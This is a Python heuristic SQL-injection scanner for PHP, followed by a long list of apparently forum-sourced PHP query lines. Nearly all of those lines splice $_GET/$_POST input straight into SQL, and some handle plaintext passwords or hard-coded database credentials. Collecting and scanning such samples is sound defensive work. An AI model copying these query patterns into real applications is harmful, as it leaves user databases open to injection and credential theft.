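A checker in the spirit of the scan described above, as an added example: this is my own code, not the author's script (which is not on the page) and not the laurent22 regex it was based on. It runs over four query lines taken from the list that follows plus two clean lines written for contrast, and tells interpolated superglobals apart from concatenated ones by tracking PHP string literals.

```python
"""Heuristic SQL-injection finder for PHP snippets (added example; not the author's
script and not the laurent22 regex).

A statement is flagged when a string literal in it starts with a SQL verb AND a
request superglobal ($_GET/$_POST/$_REQUEST/$_COOKIE) reaches the query, either
interpolated inside a double-quoted string or concatenated / passed outside any string.
Statements are split on ';' so that a prepared statement whose bind_param() call
mentions a superglobal is not counted.
"""
import re
from typing import Dict, List, Tuple

SQL_VERB_RE = re.compile(r"^\s*(select|insert|update|delete|replace)\b", re.IGNORECASE)
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def split_statements(code: str) -> List[str]:
    """Split one line of PHP on ';' characters that are not inside a string literal."""
    stmts: List[str] = []
    buf: List[str] = []
    quote = None
    i = 0
    while i < len(code):
        ch = code[i]
        if quote:                       # inside a string: copy, honouring backslash escapes
            buf.append(ch)
            if ch == "\\" and i + 1 < len(code):
                buf.append(code[i + 1])
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            buf.append(ch)
        elif ch == ";":
            stmts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    if "".join(buf).strip():            # trailing statement without ';' (or unterminated string)
        stmts.append("".join(buf))
    return stmts


def string_spans(stmt: str) -> List[Tuple[int, int, str]]:
    """Return (start, end, quote) for each string literal; start/end are the quote positions.
    An unterminated literal, as in some forum posts, runs to the end of the statement."""
    spans = []
    i = 0
    while i < len(stmt):
        if stmt[i] in "\"'":
            quote, start = stmt[i], i
            i += 1
            while i < len(stmt) and stmt[i] != quote:
                i += 2 if stmt[i] == "\\" else 1
            spans.append((start, min(i, len(stmt)), quote))
        i += 1
    return spans


def classify_statement(stmt: str) -> List[Tuple[str, str]]:
    """Return (superglobal, how) pairs for request data that reaches a SQL literal in stmt."""
    spans = string_spans(stmt)
    if not any(SQL_VERB_RE.match(stmt[s + 1:e]) for s, e, _ in spans):
        return []                       # no SQL text in this statement at all
    findings = []
    for m in SUPERGLOBAL_RE.finditer(stmt):
        how = "concatenated"            # outside any literal: '.' concatenation or a sprintf() argument
        for s, e, q in spans:
            if s < m.start() < e:
                # "$_GET[x]" inside double quotes is interpolated; inside single quotes it is plain text
                how = "interpolated" if q == '"' else ""
                break
        if how:
            findings.append((m.group(0), how))
    return findings


def scan(lines: List[str]) -> Dict[int, List[Tuple[str, str]]]:
    """Map 1-based line numbers to their findings, omitting clean lines."""
    report = {}
    for n, line in enumerate(lines, 1):
        found = [f for stmt in split_statements(line) for f in classify_statement(stmt)]
        if found:
            report[n] = found
    return report


# Sample input: four lines from the list on this page, then two clean lines written for contrast.
SAMPLE_LINES = [
    '$result=$mysqli->query("SELECT * FROM `users` WHERE `id` = \'$_POST[id]\'");',
    '$strSQL = "SELECT * FROM project2 WHERE namepro = \'".$_GET["item"]."\'";',
    "$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']);",
    "$query = sprintf('select * from orders where orders_id=%s',s($con,$_GET['rid']));",
    '$stmt = $mysqli->prepare("SELECT * FROM users WHERE id = ?"); $stmt->bind_param("i", $_POST["id"]);',
    '$name = htmlspecialchars($_GET["name"]);',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LINES).items():
        print(f"line {n}: {found}")
```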
<br />
<pre class="brush:[php]; tab-size: 4;">$result=$mysqli->query("SELECT * FROM `users` WHERE `id` = '$_POST[id]'");
$strSQL = "SELECT * FROM project2 WHERE namepro = '".$_GET["item"]."'";
$strSQL = "SELECT *,SUM(money) as tomoney FROM donate WHERE namepro = '".$_GET["item"]."'";
$sql_statement = "INSERT INTO revenueother( dateother, typeother, moneyother, paybyother) VALUES ('" .$_POST["dateo"] . "', '" .$_POST["typeo"] . "', '" .$_POST["moneyo"] . "', '" .$_POST["paybyo"] . "')";
$pay_ot = "SELECT job.ser_id,job.tech_id,service.ser_id,service.sertype_id,ser_date FROM job,service,service_type WHERE service.ser_id=job.ser_id and service_type.sertype_id=service.sertype_id AND ser_date BETWEEN '$strStartDate' and '$strEndDate' and job.tech_id = '".$_GET["tech_id"]."'";
//$q="SELECT * FROM tbl_event WHERE date(event_start)>='".$_GET['start']."' ";
$strSQL = "INSERT INTO user_addcomment (src, dst, date_on , src_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."')";
$query = sprintf('select * from orders where orders_id=%s',s($con,$_GET['rid']));
$query3 = sprintf('update product set pro_amount="%s" where pro_no="%s" ',s($con,$_POST['amts']),s($con,$_POST['id_edit']));
$strSQL = "SELECT * FROM user WHERE user_id = ".$_GET["uID"];
$sql="select * from set_table where term_ids='".$_GET[term_ids]."' ";
$sql="INSERT INTO `time_table` (`tb_id`, `tb_subject`, `tb_time`, `tb_time_min`, `tb_time_max`, `tb_col`, `tb_week`, `tb_date`, `tb_setting`, `term_ids`) VALUES (NULL, '".$_POST[subject]."', '".$ex[1]."', '".$ex1[1]."', '".$ex_time_max."', '".$_POST[cols_table]."', '".$ex[0]."', '', '0', '".$_POST[set_term]."');";
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']); //นั
mysql_query('UPDATE board SET board_views=board_views+1 WHERE board_id=' . $_GET['id']); //Update the view count of that thread
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']);
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET["userid"]."' AND statusyk = 'ยังไม่คืน' ";
$strSQL2 = "SELECT permission FROM memberdata WHERE userid = '".$_GET["userid"]."'";
$strSQL = "SELECT * FROM tbreserv WHERE ReservID = '".$_GET["ID"]."' ";
$strSQLlogin = "SELECT * FROM admin WHERE user = '".trim($_POST['username'])."'
$strSQLlogin = "SELECT * FROM personal WHERE p_card = '".trim($_POST['username'])."'
$sql = "select * From send Where 1 and DAY(date_send)='".$_GET["dd"]."' and MONTH(date_send)='".$_GET["mm"]."' and status_s='yes' ORDER BY sendNo DESC";
$sql="SELECT * FROM tbl_language WHERE id='".$_GET['id']."'";
$query = "update tbl_language set name='".$_GET['languages']."' where id='".$_GET['id']."';
1. $sql="SELECT * FROM tbl_language WHERE id='".$_GET['id']."'"; For a WHERE on id, I'd guess the result is a single value, or how many values does it return? Answer that yourself.
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_GET["CusID"]."' ";
$sql="insert into on_off(on1,off1) values(".$_POST["on1"].",".$_POST["off1"].")";
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."' and status = 'USER' ";
$strSQL2 = "SELECT * FROM bookdata WHERE MONTH(bookregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(bookregisday) = '".$_GET['txtKeyword4']."' ";
$strSQL3 = "SELECT * FROM yeumkuendata WHERE MONTH(dateborrow) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(dateborrow) = '".$_GET['txtKeyword4']."' ";
$strSQL = "SELECT * FROM memberdata WHERE (memberdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL2 = "SELECT * FROM bookdata WHERE (bookdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL3 = "SELECT * FROM yeumkuendata WHERE (yeumkuendata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."' ";
$strSQL = "INSERT INTO repost (strdate,enddate,room,name,tel) VALUES ('".$_POST["date1"]."', '".$_POST["date2"]."','".$_POST["txtRoom"]."','".$_POST["txtName"]."' ,'".$_POST["tel"]."' )";
$query = "SELECT * FROM test WHERE tags LIKE '%$_GET[value]%' order by id desc";
$query = "SELECT * FROM test WHERE tags LIKE '%".($_GET[value]).",%' order by id desc";
$strSQL = "INSERT INTO member (User,Password,Name,LastName,Gender,Address,Province,ZipCode,Tel,Email,employee,SID,Active) VALUES ('".$_POST[txtUser]."','".$_POST[txtPass]."', '".$_POST[txtName]."','".$_POST[txtLastName]."' ,'".$_POST[rdoGender]."','".$_POST[txtAddress]."', '".$_POST[txtProvince]."','".$_POST[txtZipCode]."','".$_POST[txtTel]."', '".$_POST[txtEmail]."','USER','employee','".session_id()."','No')";
$strSQL = "SELECT * FROM user WHERE username = '".trim($_POST['username'])."' ";
$strSQL = "INSERT INTO user (username,password,lastname,address,tel,email) VALUES ('".$_POST["username"]."', '".$_POST["password"]."','".$_POST["lastname"]."','".$_POST["address"]."' ,'".$_POST["tel"]."' ,'".$_POST["email"]."')";
$query ="SELECT id_name,date0,total FROM `service` where m = '".$_GET["month"]."' AND Y ='".$_GET["year"]."'";
$sqldel="Delete From stock_tb_module Where iduser='".$_GET['deluser']."'";
$seek="Select iduser from stock_tb_module Where iduser='".$_POST['user']."'";
$sqlsave="INSERT INTO stock_tb_module(iduser,typeuser) Values('".$_POST['user']."','".$_POST['type']."')";
$sql="Select stock_tb_module.*,tb_user.nameuser,tb_user.surname From stock_tb_module INNER JOIN tb_user ON stock_tb_module.iduser=tb_user.iduser Where stock_tb_module.iduser='".$_GET['user']."'";
$sql="UPDATE stock_tb_module SET typeuser='03' Where iduser='".$_GET['id']."'";
$sql="DELETE From stock_tb_module Where iduser='".$_GET['id']."'";
$sql="Select * From stock_tb_kind_type where kindid='".$_GET['kindid']."' Order by kindtypeid";
$sqldetail="INSERT INTO stock_tb_beg_master_sub(nobeg,kindtypeid,total,forbeg,user_name) Value('".$_GET['bk']."','".$_SESSION['sess_kindid'][$kid]."','".$beg[$i]."','".$for[$i]."','$user_name')";
$sqlk="Select stock_tb_kind_type.*,stock_tb_unit.unitname From stock_tb_kind_type INNER JOIN stock_tb_unit ON stock_tb_kind_type.unitid=stock_tb_unit.unitid Where kindtypeid='".$_GET['id']."'";
$sql = "SELECT * FROM saler WHERE sale_id LIKE '%".$_POST["search"]."%'";
$sql = "SELECT * FROM saler WHERE sale_id LIKE '%".$_POST["keyword"]."%'";
$strSQL = "SELECT * FROM order_details WHERE pro_id='".$_GET["txtKeyword"]."'";
$strSQL = "INSERT INTO use_addcomment (src, dst, date_on , stc_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."',)";
$strSQL = "SELECT * FROM bookdata inner join typedata on bookdata.typeid = typedata.typeid WHERE (namebook LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' ) ";
$strSQL = "SELECT * FROM memberdata inner join majordata on memberdata.majorid = majordata.majorid WHERE userid = '".$_GET["userid"]."' ";
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET['userid']."' ";
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )"; // original
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' "; // changed
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' ";
select * from tabientb where (tabienno1 and tabienno2) LIKE '%$_POST[search]%'
$sql = " select * from tabientb where CONCAT(tabienno1, tabienno2) LIKE '%$_POST[search]%' ";
$sql = " select * from tabientb where (tabienno LIKE '%$_POST[search]%') AND (tabienno2 LIKE '%$_POST[search]%') ";
select * from tabientb where tabienno1 LIKE '%enno2 LIKE '%$_POST[search]%'
$strSQL = "INSERT INTO `member`(`username`,`password`,`name`,`lname`) VALUES ('".$_POST['username']."',
$strSQL = "INSERT INTO memberdata (userid,password,sex,titlename,fname,lname,majorid,email,mempic,status,memregisday) VALUES ('".$_POST["userid"]."',
$strSQL = "SELECT * FROM orders WHERE OrderID = '".$_GET["OrderID"]."' ";
$strSQL = "SELECT * FROM student WHERE (class='".$_GET["txtKeyword"]."')";
$strSQL = "SELECT * FROM yeumkuendata WHERE ykid = '".trim($_POST['ykid'])."' ";
$strSQL = "INSERT INTO yeumkuendata (userid,numberid,dateborrow,datesetreturn,statusyk) VALUES ('".$_POST["userid"]."',
$query2 = sprintf('select * from department where d_id=%s',s($con,$_GET['dept']));
$query2 = sprintf('select * from departmentp inner join personnel on departmentp.ds_id = personnel.ds_id where departmentp.ds_id=%s',s($con,$_GET['dept']));
$sel_part = "select * from tblpart where PartID = '".$_POST['chkorder'][$i]."'";
$sql="select b.pro_name,b.coler,b.pro_year,a.cat_name from category as a inner join product as b on a.cat_id=b.cat_id inner join branch as c on b.id_b=c.id_b where c.id_b='".$_GET['id_b']."' GROUP BY pro_name,coler,pro_year";
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and id_b='".$_GET['id_b']."'"))
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and coler='".$result1['coler']."' and pro_year='".$result1['pro_year']."' and id_b='".$_GET['id_b']."'"))
$strSQL = "SELECT * FROM book WHERE dates='".$_POST["myDate1"]."' and btime= '".$_POST["mytime"]."' and status='1' rid = '".$_POST["myRoom"]."' ";
$strSQLday1 = "SELECT SUM(`INV# AMOUNT`) as Total FROM `orderheader` WHERE `INV# DATE` LIKE '%20160901%' AND `ORDER DATE` LIKE '%20160901%' AND `SALESMAN` LIKE '43406' "; /* WHERE (TERM_NO LIKE '%".$_GET["txtKeyword"]."%') */
$query_rs_type="SELECT * FROM product_type WHERE gr_id ='".$_GET['lsgroup']."' ";
$strSQL = "SELECT * FROM calendar WHERE ((year = '".trim($_POST['year'])."' and month = '".trim($_POST['month'])."'
$strSQL = "INSERT INTO calendar (title,color,year,month,day,time_start,time_end,Email) VALUES ('".$_POST["title"]."','".$_POST["color"]."','".$_POST["year"]."','".$_POST["month"]."',
$sql="insert into ems (ems) values ('".$_POST['ems']."')";
$strSQL = "SELECT * FROM customer WHERE (CustomerID LIKE '%".$_GET["txtKeyword"]."%' or Email LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQLdel = "DELETE FROM tblmyfiles WHERE ID = '".$_GET["ID"]."'";
$sqltxtQty = "SELECT product_amount FROM product WHERE product_id ='".$_POST["txtProductID"]."'" ;
$strSQL = "SELECT * FROM files WHERE (Name='".$_GET["txtKeyword"]."' or keyword='".$_GET["txtKeyword"]."' )";
$strSQL = "SELECT * FROM files WHERE (Name LIKE '%".$_GET["txtKeyword"]."%' or keyword LIKE '%".$_GET["txtKeyword"]."%' )";
$sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";
$sql = $sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";
$strSQL = "INSERT INTO Scan (RFID,Date,Time,Late) VALUES ('".$_POST["txtStudentID"]."','".date("Y-m-d")."' ,'".date("H:i:s")."','".$timeDiff."')";
$sql="Update member set Password='".$_POST["txtPass"]."',Name='".$_POST["txtName"]."',LastName='".$_POST["txtLastName"]."',Gender='".$_POST["rdoGender"]."',Address='".$_POST["txtAddress"]."',Province='".$_POST["txtProvince"]."',ZipCode='".$_POST["txtZipCode"]."',Tel='".$_POST["txtTel"]."',Email='".$_POST["txtEmail"]."' where MemberID=$id";
$stmt=$db->prepare("delete from multiupload where id ='".$_GET['id']."'");
$strSQL = "SELECT * FROM location_marker WHERE Locationname_id ='$_GET[Locationname_id]'";
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]'";
$strSQL = "SELECT * FROM location_polylinename WHERE Locationname_id ='$_GET[Locationname_id]'";
$rs = mysql_query("SELECT * FROM tb_applyjob WHERE jid = $_GET[jid]");
$strSQL = "SELECT * FROM family WHERE family_name_th = '".$_POST["txtfamily_name_th"]."' ";
$strSQL = "SELECT asset FROM tbl_asset WHERE 1 AND asset = '".$_POST["sCusID"]."'";
$query2 = sprintf('update orders set orders_status=2 where orders_id=%s',s($con,$_POST['orid']));
$strSQL = "SELECT * FROM animal WHERE animal_id = '".$_GET["CusID"]."' ";
$sql = "insert into uploadimags(name,date,image) value('".$_POST['Name']."','".date('Y-m-d H:i:s')."','".$new_images."')";
$sqll = "select * from uploadimags where name = '".$_POST['Name']."'";
$query1="SELECT * from tag_work_building_2 where id = '$_GET[id]'";
$strSQL = "INSERT INTO calendar (title,year,month,day,time_start,time_end) VALUES ('".$_POST["title"]."','".$_POST["year"]."','".$_POST["month"]."',
$query = sprintf('select * from event where id_event="%s"',s($con,$_GET['idv']));
select * from event where id_event= $_GET['id_event']
$strSQL = "SELECT * FROM customer WHERE 1 AND Customer_Code = '".$_POST["sCusID"]."' ";
$sql="select * from tabletb where id='$_GET[id]'";
When it reaches $sql="select * from tabletb where id='$_GET[id]'"; there is no $_GET[id] value being sent
$sql_cate="select * from category where id='$_GET[id]'";
$sql = "select * from table_name where id = '$_GET['id']' ";
$sql = "select * from employee where name like '%{$_POST['itemname']}%' or duty like '%{$_POST['itemname']}%'";
$strSQL = "SELECT * FROM packing WHERE ProductID = '".$_GET["FilesID"]."' " ;
$strSQL = "SELECT * FROM flavor WHERE ProductID = '".$_GET["FilesID"]."' ";
///$strSQL = "SELECT * FROM idp3 WHERE (day LIKE '%".$_GET["txtKeyword"]."%' or day LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQL = "SELECT * FROM tbl_item,rentorder WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%' and rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL = "SELECT * FROM tbl_item WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL2 = "SELECT * FROM rentorder WHERE (rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL = "SELECT * FROM number WHERE username ='".trim($_POST['usernamelogin'])."'
$strSQL2 = "INSERT INTO files (PicName,FilesName) VALUES ('".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')";
$strSQL2 = "INSERT INTO files (ID,PicName,FilesName) VALUES ('".$insertID."',".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')"; // added the ID field to the file table
$res = $mysqli->query("SELECT * FROM article WHERE article_id =".$_GET['u']);
$query2= sprintf ('select * from product where pro_no="%s" ',s($con,$_GET['id_del']));
$query = sprintf('delete from product where pro_no="%s" ',s($con,$_GET['id_del']));
$q="SELECT * FROM car WHERE date(timego)>='".date("Y-m-d",$_GET['start'])."' ";
$objQuery1 = "SELECT * FROM Register where $ddlSelect LIKE '%".$_POST["txtKeyword"]."%'" ;
; //*** Insert Record ***// $objConnect = mysql_connect(localhost","adtec","adtec1234") or die("Error Connect to Database"); $objDB = mysql_select_db("adtec"); mysql_query("SET character_set_results=utf8"); mysql_query("SET character_set_client=utf8"); mysql_query("SET character_set_connection=utf8"); $strSQL = "INSERT INTO album"; $strSQL .="(AlbumName,AlbumShot,Details,Male,Female,Tim,one,two,tre,four,five,note) VALUES ('".$_POST["txtAlbumName"]."','".$fileName."','". $_POST["Namer"]."','". $_POST["M"]."','". $_POST["F"]."','". $_POST["more"]."','". $_POST["textfield4"]."','".$_POST["textfield5"]."','".$_POST["textfield6"]."','".$_POST["textfield7"]."','".$_POST["textfield8"]."','".$_POST["textfield"]."')"; $objQuery = mysql_query($strSQL); mysql_close($objConnect); } ?>
Should the fix be at $sql_data = "update tb_order set paystatus='$_POST[paystatus]' where refid = '$_POST[refid2]'"; or not?..
mysql_query("INSERT INTO contact (id,message,name,phone,email,dateregist,timeregist) values('', '$_POST[message]','$_POST[name]','$_POST[phone]','$_POST[email]','$e_date', '$etime')") or die ("Cannot Add Database");
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' OR Email = '".$_POST["eMail"]."' ";
$sort = mysqli_query ($con,"SELECT order_no FROM choose where Ad_num =".$_GET['pno'] );
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID "]."' ";
$strSQL = "SELECT * FROM radio_member WHERE Username = '".trim($_POST['txtUsername'])."' ";
$strSQL = "INSERT INTO radio_member (Username,Password,Name) VALUES ('".$_POST["txtUsername"]."',
$resultms = mysql_query("update ms set actqty = actqty-'".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'");
$strCHECKms = "SELECT * FROM ms WHERE shopcode = '".$shop."' AND productid = '".$_POST["productid$i"]."'";
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$shop."' AND productid = '".$_POST["productid$i"]."'");
$resultcheckstock = mysql_query("update checkstock set status = 'Y' where shopcode='".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'");
in the insert into here, store the value of $_POST['province_id][$i]
$sql="select * from time_sample where team='".$_POST['Require']."' and day_='".$_POST['day_']."' order by id desc";
$sql="select * from sample_user where id_staff='".$arr['id_staff']."' and day_='".$_POST['day_']."'";
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"]."' where `p_id`= '".$_POST["txt_id"]."'";
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"][$i]."' where `p_id`= '".$_POST["txt_id"][$i]."'";
$strSQL2 = "SELECT * FROM orders_detail WHERE o_id = '".$_GET["o_id"]."' ";
//$strSQL = "SELECT * FROM products,bom WHERE (Pro_ID LIKE '%".$_GET["txtKeyword"]."%')";
$strSQL = "INSERT INTO files (Name,FilesName) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["name"]."')";
$strSQL = "INSERT INTO files (Name,FilesName,upload) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["filUpload2"]["name"]."')";
$strSQL = "SELECT * FROM bk_room_type WHERE room_type_name = '".trim($_POST['room_type_name'])."'";
$strSQL = "SELECT * FROM bk_building WHERE building_name = '".trim($_POST['building_name'])."'";
$strSQL = "SELECT * FROM bk_janitor WHERE janitor_name = '".trim($_POST['janitor_name'])."'";
$strSQL = "SELECT * FROM bk_member_title WHERE titlename = '".trim($_POST['titlename'])."'";
$strSQL = "SELECT * FROM bk_member_majorname WHERE majorname = '".trim($_POST['majorname'])."'";
Result=mysql_query("INSERT INTO tb_example (Booking_ID,Province_ED) VALUES ('".$Booking_ID."','".$_POST['Province_ID'][$i]."')");
$strSQL = "SELECT * FROM customer WHERE (billing LIKE '%".$_GET["txtCredit"]."%' AND billing LIKE '%".$_GET["txtCash"]."%' )";
$sql_up = "update product set ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";
$sql_up = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";
$sql_up = "update product set Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]',Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";
$sql_update = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";
$sql_up = "update product set Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";
$query = "SELECT * FROM amount_cus where = " .$_GET['edit_id'];
$strSQL = "INSERT INTO conven (convenID,dormitoryID,coname,costatus) VALUES (NULL,'$convenroomid','".$_POST["conven"][$i]."','T')";
$StrSql = "Select * from picupload WHERE ServiceCode LIKE '%".$_GET["txtKeyword"]."%'";
$strSQL = "SELECT * FROM history_med WHERE (id_run LIKE '%".$_POST["recvid"]."%' )";
$strSQL = "SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_GET["item"]."' ORDER BY carlicense ASC";
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_GET["item"]."' ORDER BY carlicense ASC";
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC";
$result= mysql_query("SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC");
echo $strSQL = "UPDATE article SET topic = '".trim($_POST['topic'])."'
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' and Password = '".trim($_POST['txtPassword'])."' and Active = 'Yes' ";
SELECT * FROM ( select * from personal where p_id=".($_GET['p_id']*1).") per
$strSQL = "SELECT * FROM tbRoom WHERE ID_Room = '".$_GET["RoomID"]."' ";
$q="SELECT * FROM doctable WHERE name='หมอหนึ่ง' ORDER by date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE id='$roo_id' ORDER by date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE date(timego)>='".$_GET['start']."' ";
$q="SELECT * FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."' ";
$sqld = "DELETE FROM brand WHERE id='".$_GET['did']."'";
$result = mysql_query("update product set qty = qty - '".$_POST["txtQty$i"]."' where ProductID = '".$_POST["txtProductID2$i"]."'");
$strSQL3 = "SELECT * FROM tb_ps WHERE PS_id = '".$_GET['id']."' ";
$strSQL2 = "SELECT * FROM tb_ps WHERE PS_sale LIKE '%".$_GET['txtkeyword']."%' ";
$sql = "UPDATE files SET filestatus = '$status' where FileID = '".$_POST['FileID']."'";
mysql_query("UPDATE member SET m_view=(m_view+1) WHERE m_id = '".$_GET["id"]."' AND m_line = '".$_GET["line"]."'" );
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."'";
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."' ";
$strSQL = ("INSERT INTO history_med(id_person,name_med,value_med) VALUES('"."','".$_POST["xx"]."','".$_POST["xy"]."')") ;
$q="select * from member where k_name like'$_GET[name]%' and k_age like'$_GET[age]%' and k_sex like '$_GET[sex]%' and k_address like '$_GET[s]%' and k_date like '$_GET[k_date]%'";
$sql ='SELECT * FROM member WHERE u_ser = "'.$_POST['i_ur'].'"';
$strSQL2 = "UPDATE product SET product_qty = product_qty - ".$rs['product_qty']." WHERE product_id = '".$_REQUEST['product_id']."'";
$sql3 = "select * from send where send_id = '$_GET[user_send_id]'";
$sql = " insert into book( book_id, book_name , book_detail, typebook_id) VALUES ( null, '$bookname', '$_POST[book_detail]', '$_POST[typebook_id]');";
$sql = " insert into send ( send_id, user_id, book_id , subject , send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key', '$today' , '$time');";
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '0', '0' ,'$_POST[approve]' );";
$sql = " insert into book( book_id, book_name, book_pdf , book_detail, typebook_id) VALUES ( null, '$bookname','$bookpdf', '$_POST[book_detail]', '$_POST[typebook_id]');";
$sql = " insert into send ( send_id, user_id, book_id , subject ,send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key' ,'$today' , '$time');";
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '$vision[$i]', '0' ,'$_POST[approve]' );";
$sql1 = "select * from court where court_time = '".$_GET["item"]."'";
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC";
$First = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC LIMIT 0,1";
